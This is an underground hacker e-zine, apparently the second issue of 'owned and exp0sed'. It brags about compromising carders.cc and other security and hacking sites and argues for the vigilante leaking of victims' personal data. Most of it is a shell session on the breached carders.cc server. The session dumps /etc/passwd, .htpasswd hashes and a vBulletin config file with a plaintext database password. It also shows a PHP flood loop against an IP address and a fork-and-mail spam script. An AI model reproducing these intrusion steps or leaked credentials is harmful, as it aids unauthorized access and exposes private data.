Part 1 : hack got hacked.. happy reading anyone!!

====================
The Listed
====================

carders.cc
inj3ct0r
ettercap
exploit-db
backtrack
free-hack

====================
~ INTRO ~ !
====================

Greetings followers, welcome to the second issue of owned and exp0sed.
This file is encoded with UTF-8, so to view it properly use unicode.

For those who are reading and laughing with us:
We (your happy ninjas) wish you a MERRY HAXMAZ


After our first release we got wind of some strange rumours. So just
to be sure, we need to clarify some facts.

So, who are we? First, lets talk about some things we are not. We are
not an underground rival kiddy group. We are not a cyber mafia gang.
We are the watchmen, the hackers who quietly observe the scene. If any
skiddy community gets too big, we shut them down. If any lamer causes
too much trouble, we shut them down. If any group keeps fucking stuff
up, we stop them.

So, why are we doing this? Some people say that being a vigilanty is
wrong and that we are actually criminals. What can we say? This may be
true. But the way we see it, if your not part of the solution, your
part of the fucking problem. These idiots spread garbage across our
scene and that is why they got owned. We take pride in what is left of
the scene and we have serious problems with those who rape it.

That's why we do what MUST be done.

There are some things left we would like to say about carders.cc.
First of all, they came back online after they got rm'ed. In the first
issue we gave our word that we would make sure carders.cc would never
come back. Well, we delivered on that promise in this issue. And as
such carders.cc has once again been eliminated. Maybe this time they
will get the hint.

Also, Heise Security said that we were a rival group trying to
capitalize on the demise of carders.cc. Apparently they weren't happy
about our disclosure of the carders.cc database that included the
personal information of carders.cc victims. What Heise forgot was that
with this action, all the victims of carders.cc got the chance to
realize that they were victims of fraud. You can try to say that our
disclosure of the database put them at even greater risk of fraud but
we disagree. What is more risky? Having your information secretly on
an "underground" carding forum where it WILL be sold and used in
frauduelent activity? Or, having it released so that you can be
notified and take the appropriate action to mitigate the damage that
has been done? I know which option I'd rather have.

It is quite impressive how many people wrote about the Carders Hack
without even bothering to read the zine. It is hilarious to see how
the media works. Somebody writes an article, others copy information
from it, others copy from it again. If we take a shit in a bowl. Then
you eat that shit and puke it back into a different bowl for someone
else to eat then they do the same thing, what do you have? "Two
Journo's One Cup" is what you have. Fucking pathetic.

On the other hand, we'd like to thank Brian Krebs. Even if some of his
conclusions were way off the mark, he was still the first one to
report about carders.cc and nearly every other article was based on
Brian's work. At least you didn't eat shit and regurgitate it like the
rest Brian, keep up the good work.

Enough jibber jabber, let's get to business. You will soon realize
that our targets vary:

We owned ettercap because we were tired of people firing that shit up
and pretending to be a l33th4x0r sheep who think they are the greatest
hackerz with their ARP spoofing toolkitz.. If you have installed
ettercap in the last 5 years you may want to check yo shit (;p).

We owned offsec including backtrack and exploit-db because they are
fucking security "expert" maggots (oops s/m/f/) who just fail so hard
at security that we wonder why people really take their training
courses. We imagine it's like open mic night at the laughatorium.

We owned inj3ct0r because they are lameass wannabe milw0rm kids whose
sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake
anyone?).

We owned carders.cc (AGAIN) because they are unable to learn from
their mistakes and keep spreading garbage around the underground.

We owned free-hack because they are developing into one of the
largest, most arrogant script-kiddie breeding grounds on the
intertubez.

======================
~ carders.cc ~ !
======================

Here we go again. We hope that everybody was looking forward to see
carders.cc getting owned again. We kept our word, didn't we? Let us
begin:

____________________________________________________________________
| |
| The ninja guys piss on you and your half trained monkeys or |
| whatever your leet underground team consists of. If you continue, |
| you will be owned over again and rm'd twice. Also we will punch |
| you in the face. |
|____________________________________________________________________|

Our lazy ninja squad was too drunk to come over and punch you in the
fucking face. So we'll just stick to owning you for now. Carders.cc
went down for a few days, but came back as if nothing had happened.
They switched some server admins and installed some new software in
the hopes that they would be safe. They turned on some l33t "security"
settings like PHP's "Safe Mode" and "Openbase Dir", and they also
disabled lots of functions. All in all they thought they were pretty
locked down. Well, obviously they were fucking wrong. It's hard to
harden a system when everything is backdoored and unfortunately we are
just too ninja to get stopped by your silly protections. You can never
stop us. We will always keep owning and exp0sing you.

No. Matter. What. You. Try.

|$ uname -a
FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

|$ id
uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc)

|$ w
1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54
USER TTY FROM LOGIN@ IDLE WHAT

|$ alias ls="ls -la"

|$ ls

total 47
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT
-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a
drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin
drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot
dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev
drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc
drwxr-x--x 4 root wheel 512 Nov 1 23:54 home
drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib
drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec
drwxr-xr-x 2 root wheel 512 Jan 18 2010 media
drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt
dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc
drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root
drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin
lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys
drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp
drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr
drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var

|$ cat /etc/passwd
# |$FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp |$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin
cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin

|$ cd /root

|$ ls
total 412628
drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 .
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
-rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw------- 1 root wheel 2909 Dec 7 22:31 .history
-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login
-rw------- 1 root wheel 61 Jul 5 21:44 .lesshst
-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login
drwx------ 3 root wheel 512 Dec 6 02:34 .mc
-rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
drwx------ 2 root wheel 512 Nov 7 17:20 .ssh
-rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql
drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup
drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups
drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack
-rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip
-rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php
-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php
drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql
-rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php
-rw------- 1 root wheel 16877 Jul 29 20:44 mbox
drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php
drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c
-rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz
drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup

Mad PHP-Codez again!

|$ cat ddos.php
|||while(1==1) {
|$fp = fsockopen("92.241.190.202", 80, |$errno, |$errstr, 30);
}
||?>

|$ cat info.php
||phpinfo();
|?>

|$ cat example.php
|||pcntl_fork();
pcntl_fork();
pcntl_fork();
pcntl_fork();

for (|$i=0; |$i<10; |$i++) {
echo ".";
mail("jeka@2x4.ru","spammtest","this is a very big message...");
}
||?>

|$ cd /home/carderscc

|$ ls
total 18
drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .
drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc
drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc
drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma
drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp
drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo

|$ cd carders.cc

|$ ls
total 2286
dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 .
drwxr-x--- 7 carderscc www 512 Nov 18 20:45 ..
-r-xr-x--- 1 carderscc www 1107 Dec 5 15:34 .htaccess
-r-xr-x--- 1 carderscc www 20 Nov 12 18:16 .htpasswd
dr-xr-x--- 4 carderscc www 2048 Nov 18 21:17 admincp
-r-xr-x--- 1 carderscc www 40115 Oct 29 20:53 ajax.php
-r-xr-x--- 1 carderscc www 75525 Oct 29 20:53 album.php
-r-xr-x--- 1 carderscc www 19041 Oct 29 20:52 announcement.php
dr-xr-x--- 2 carderscc www 512 Oct 29 22:39 archive
-r-xr-x--- 1 carderscc www 8668 Oct 29 20:52 asset.php
-r-xr-x--- 1 carderscc www 20406 Oct 29 20:52 assetmanage.php
-r-xr-x--- 1 carderscc www 15710 Oct 29 20:52 attachment.php
-r-xr-x--- 1 carderscc www 6658 Oct 29 20:52 attachment_inlinemod.php
-r-xr-x--- 1 carderscc www 3449 Oct 29 20:52 blog_attachment.php
-r-xr-x--- 1 carderscc www 96043 Oct 29 20:53 calendar.php
-r-xr-x--- 1 carderscc www 43 Oct 29 20:52 clear.gif
dr-xr-x--- 9 carderscc www 3584 Nov 2 00:32 clientscript
-r-xr-x--- 1 carderscc www 15270 Oct 29 20:52 converse.php
dr-xr-x--- 7 carderscc www 512 Nov 2 00:33 cpstyles
-r-xr-x--- 1 carderscc www 3231 Oct 29 20:52 cron.php
-r-xr-x--- 1 carderscc www 5139 Oct 29 20:52 css.php
dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customavatars
dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customgroupicons
dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 customprofilepics
-r-xr-x--- 1 carderscc www 1707 Oct 29 20:52 editor.php
-r-xr-x--- 1 carderscc www 46932 Oct 29 20:53 editpost.php
-r-xr-x--- 1 carderscc www 1326 Oct 29 20:52 entry.php
-r-xr-x--- 1 carderscc www 30006 Oct 29 20:53 external.php
-r-xr-x--- 1 carderscc www 9888 Oct 29 20:52 faq.php
-r-xr-x--- 1 carderscc www 5430 Jul 29 15:42 favicon.ico
-r-xr-x--- 1 carderscc www 22568 Oct 29 20:53 forum.php
-r-xr-x--- 1 carderscc www 42374 Oct 29 20:53 forumdisplay.php
-r-xr-x--- 1 carderscc www 1988 Oct 29 20:52 global.php
-r-xr-x--- 1 carderscc www 155760 Oct 29 20:54 group.php
-r-xr-x--- 1 carderscc www 26072 Oct 29 20:53 group_inlinemod.php
-r-xr-x--- 1 carderscc www 11470 Oct 29 20:53 groupsubscription.php
-r-xr-x--- 1 carderscc www 8961 Oct 29 20:53 image.php
dr-xr-x--- 28 carderscc www 1536 Nov 22 16:54 images
dr-xr-x--- 9 carderscc www 6144 Nov 6 19:47 includes
-r-xr-x--- 1 carderscc www 2318 Oct 29 20:53 index.php
-r-xr-x--- 1 carderscc www 46943 Oct 29 20:53 infraction.php
-r-xr-x--- 1 carderscc www 187725 Oct 29 20:54 inlinemod.php
-r-xr-x--- 1 carderscc www 23934 Jul 29 21:10 invites.php
-r-xr-x--- 1 carderscc www 6778 Aug 14 08:15 itrader.php
-r-xr-x--- 1 carderscc www 14964 Aug 14 08:15 itrader_detail.php
-r-xr-x--- 1 carderscc www 13515 Aug 14 08:15 itrader_feedback.php
-r-xr-x--- 1 carderscc www 1405 Aug 14 08:15 itrader_global.php
-r-xr-x--- 1 carderscc www 22171 Aug 14 08:15 itrader_main.php
-r-xr-x--- 1 carderscc www 3970 Aug 14 08:15 itrader_report.php
-r-xr-x--- 1 carderscc www 11362 Oct 29 20:53 joinrequests.php
-r-xr-x--- 1 carderscc www 1643 Oct 29 20:53 list.php
-r-xr-x--- 1 carderscc www 10869 Oct 29 20:53 login.php
dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 madp
-r-xr-x--- 1 carderscc www 30166 Oct 29 20:53 member.php
-r-xr-x--- 1 carderscc www 16314 Oct 29 20:53 member_inlinemod.php
-r-xr-x--- 1 carderscc www 40267 Oct 29 20:53 memberlist.php
-r-xr-x--- 1 carderscc www 22186 Oct 29 20:53 misc.php
dr-xr-x--- 2 carderscc www 512 Nov 6 19:48 modcp
-r-xr-x--- 1 carderscc www 76749 Oct 29 20:53 moderation.php
-r-xr-x--- 1 carderscc www 6701 Oct 29 20:53 moderator.php
-r-xr-x--- 1 carderscc www 17474 Oct 29 20:53 newattachment.php
-r-xr-x--- 1 carderscc www 41001 Oct 29 20:53 newreply.php
-r-xr-x--- 1 carderscc www 20107 Oct 29 20:53 newthread.php
-r-xr-x--- 1 carderscc www 21724 Oct 29 20:53 online.php
dr-xr-x--- 5 carderscc www 512 Nov 2 00:33 packages
-r-xr-x--- 1 carderscc www 8018 Oct 29 20:53 payment_gateway.php
-r-xr-x--- 1 carderscc www 13282 Oct 29 20:53 payments.php
-r-xr-x--- 1 carderscc www 3984 Oct 29 20:53 picture.php
-r-xr-x--- 1 carderscc www 16587 Oct 29 20:53 picture_inlinemod.php
-r-xr-x--- 1 carderscc www 26091 Oct 29 20:53 picturecomment.php
-r-xr-x--- 1 carderscc www 29260 Oct 29 20:53 poll.php
-r-xr-x--- 1 carderscc www 10336 Oct 29 20:53 posthistory.php
-r-xr-x--- 1 carderscc www 76507 Oct 29 20:54 postings.php
-r-xr-x--- 1 carderscc www 7009 Oct 29 20:53 printthread.php
-r-xr-x--- 1 carderscc www 79357 Oct 29 20:54 private.php
-r-xr-x--- 1 carderscc www 163617 Oct 29 20:55 profile.php
-r-xr-x--- 1 carderscc www 56285 Oct 29 20:54 register.php
-r-xr-x--- 1 carderscc www 7216 Oct 29 20:53 report.php
-r-xr-x--- 1 carderscc www 14687 Oct 29 20:53 reputation.php
-r-xr-x--- 1 carderscc www 34539 Oct 29 20:54 search.php
-r-xr-x--- 1 carderscc www 22632 Oct 29 20:54 sendmessage.php
-r-xr-x--- 1 carderscc www 12407 Oct 29 20:54 showgroups.php
-r-xr-x--- 1 carderscc www 12660 Oct 29 20:54 showpost.php
-r-xr-x--- 1 carderscc www 80037 Oct 29 20:54 showthread.php
dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 signaturepics
dr-xr-x--- 2 carderscc www 512 Nov 2 00:32 store_sitemap
-r-xr-x--- 1 carderscc www 38784 Oct 29 20:54 subscription.php
-r-xr-x--- 1 carderscc www 5321 Oct 29 20:54 tags.php
-r-xr-x--- 1 carderscc www 8722 Oct 29 20:54 threadrate.php
-r-xr-x--- 1 carderscc www 11068 Oct 29 20:54 threadtag.php
-r-xr-x--- 1 carderscc www 61 Oct 29 20:52 uploadprogress.gif
-r-xr-x--- 1 carderscc www 39639 Oct 29 20:54 usercp.php
-r-xr-x--- 1 carderscc www 20956 Oct 29 20:54 usernote.php
-r-xr-x--- 1 carderscc www 16518 Jul 29 16:35 vaispy.php
dr-xr-x--- 13 carderscc www 1024 Nov 2 00:32 vb
dr-xr-x--- 4 carderscc www 512 Nov 6 19:48 vbseo
-r-xr-x--- 1 carderscc www 45239 Nov 6 19:48 vbseo.php
-r-xr-x--- 1 carderscc www 4112 Nov 6 19:47 vbseocp.php
-r-xr-x--- 1 carderscc www 27801 Oct 29 20:54 visitormessage.php
-r-xr-x--- 1 carderscc www 1647 Oct 29 20:54 widget.php
-r-xr-x--- 1 carderscc www 3769 Oct 29 20:54 xmlsitemap.php

|$ cat .htpasswd
ddos:XScRLnTwdeJ6k

|$ cat includes/config.php
|||/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.3 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is 2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/

// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
|$config['Database']['dbtype'] = 'mysql';

// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
|$config['Database']['dbname'] = 'carderscc_01';

// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
|$config['Database']['tableprefix'] = '';

// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
|$config['Database']['technicalemail'] = 'dbmaster@example.com';

// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
|$config['Database']['force_sql_mode'] = false;



// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put herecat ddos.php




, leave the default values.
|$config['MasterServer']['servername'] = 'localhost';
|$config['MasterServer']['port'] = 3306;

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
|$config['MasterServer']['username'] = 'carderscc_01';
|$config['MasterServer']['password'] = 'VGZU76f3zgugdew&5gd3ugz&gd3uzguzg|$dh3jgduzgdUGZDufe76g3d';

// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
|$config['MasterServer']['usepconnect'] = 0;



// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
|$config['SlaveServer']['servername'] = '';
|$config['SlaveServer']['port'] = 3306;
|$config['SlaveServer']['username'] = '';
|$config['SlaveServer']['password'] = '';
|$config['SlaveServer']['usepconnect'] = 0;



// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
|$config['Misc']['admincpdir'] = 'admincp';
|$config['Misc']['modcpdir'] = 'modcp';

// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
|$config['Misc']['cookieprefix'] = 'bb';

// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// |$config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// |$config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
|$config['Misc']['forumpath'] = '';



// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
|$config['SpecialUsers']['canviewadminlog'] = '4835,9816';

// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
|$config['SpecialUsers']['canpruneadminlog'] = '4835,9816';

// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
|$config['SpecialUsers']['canrunqueries'] = '4835,9816';

// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
|$config['SpecialUsers']['undeletableusers'] = '';

// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
|$config['SpecialUsers']['superadministrators'] = '4835,9816';

// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// |$config['Datastore']['class'] = 'vB_Datastore_Filecache';

// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// |$config['Datastore']['prefix'] = '';

// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
|$config['Datastore']['class'] = 'vB_Datastore_Memcached';
|$i = 0;
// First Server
|$i++;
|$config['Misc']['memcacheserver'][|$i] = '127.0.0.1';
|$config['Misc']['memcacheport'][|$i] = 11211;
|$config['Misc']['memcachepersistent'][|$i] = true;
|$config['Misc']['memcacheweight'][|$i] = 1;
|$config['Misc']['memcachetimeout'][|$i] = 1;
|$config['Misc']['memcacheretry_interval'][|$i] = 15;
*/

// ****** The following options are only needed in special cases ******

// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
|$config['Mysqli']['charset'] = 'latin1';

// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// |$config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
|$config['Mysqli']['ini_file'] = '/etc/my.cnf';

// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
|$config['Misc']['maxwidth'] = 2592;
|$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| #
|| # CVS: |$RCSfile|$ - |$Revision: 32878 |$
|| ####################################################################
\*======================================================================*/

|$ cd ..

|$ cd jabber.carders.cc

|$ ls
total 812
drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 .
drwxr-x--- 7 carderscc www 512 Nov 18 20:45 ..
-rwxrwxr-x 1 carderscc www 7948 Apr 28 2008 AC_OETags.js
-rwxrwxr-x 1 carderscc www 629979 Apr 28 2008 SparkWeb.swf
-rw-r--r-- 1 carderscc www 128693 Dec 2 00:34 c100.txt
-rwxrwxr-x 1 carderscc www 3638 Apr 28 2008 favicon.ico
-rwxrwxr-x 1 carderscc www 1272 Apr 28 2008 history.htm
-rwxrwxr-x 1 carderscc www 1292 Apr 28 2008 history.js
-rwxrwxr-x 1 carderscc www 2656 Apr 28 2008 history.swf
-rwxrwxr-x 1 carderscc www 14590 Jun 30 16:00 index.html
-rwxrwxr-x 1 carderscc www 2518 Apr 28 2008 osxmousewheel.js
-rwxrwxr-x 1 carderscc www 657 Apr 28 2008 playerProductInstall.swf

|$ cd pma

|$ cat .htpasswd
admin:0VisONWLe5DJE

|$ cd /

|$ls
total 47
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT
-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a
drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin
drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot
dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev
drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc
drwxr-x--x 4 root wheel 512 Nov 1 23:54 home
drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib
drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec
drwxr-xr-x 2 root wheel 512 Jan 18 2010 media
drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt
dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc
drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root
drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin
lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys
drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp
drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr
drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var

|?>

|$ cd /home/cardersblog

|$ ls
total 8
drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .
drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc
drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp

|$ cd blog.carders.cc

|$ ls
total 2928
dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 .
drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 ..
-rw-r--r-- 1 cardersblog www 188 Nov 21 00:18 .htaccess
-r-xr-x--- 1 cardersblog www 397 Aug 27 17:22 index.php
-r-xr-x--- 1 cardersblog www 2683109 Jul 18 16:06 latest.tar.gz
-r-xr-x--- 1 cardersblog www 15410 Aug 27 17:22 license.txt
-r-xr-x--- 1 cardersblog www 9122 Aug 27 17:22 readme.html
-r-xr-x--- 1 cardersblog www 4391 Aug 27 17:22 wp-activate.php
dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-admin
-r-xr-x--- 1 cardersblog www 40284 Aug 27 17:23 wp-app.php
-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-atom.php
-r-xr-x--- 1 cardersblog www 274 Aug 27 17:23 wp-blog-header.php
-r-xr-x--- 1 cardersblog www 3926 Aug 27 17:23 wp-comments-post.php
-r-xr-x--- 1 cardersblog www 238 Aug 27 17:23 wp-commentsrss2.php
-r-xr-x--- 1 cardersblog www 3173 Aug 27 17:23 wp-config-sample.php
-r-xr-x--- 1 cardersblog www 3506 Jul 31 14:20 wp-config.php
dr-xr-x--- 6 cardersblog www 512 Aug 27 18:05 wp-content
-r-xr-x--- 1 cardersblog www 1255 Aug 27 17:23 wp-cron.php
-r-xr-x--- 1 cardersblog www 240 Aug 27 17:23 wp-feed.php
dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-includes
-r-xr-x--- 1 cardersblog www 2002 Aug 27 17:23 wp-links-opml.php
-r-xr-x--- 1 cardersblog www 2441 Aug 27 17:23 wp-load.php
-r-xr-x--- 1 cardersblog www 26059 Aug 27 17:23 wp-login.php
-r-xr-x--- 1 cardersblog www 7774 Aug 27 17:23 wp-mail.php
-r-xr-x--- 1 cardersblog www 487 Aug 27 17:23 wp-pass.php
-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rdf.php
-r-xr-x--- 1 cardersblog www 316 Aug 27 17:23 wp-register.php
-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rss.php
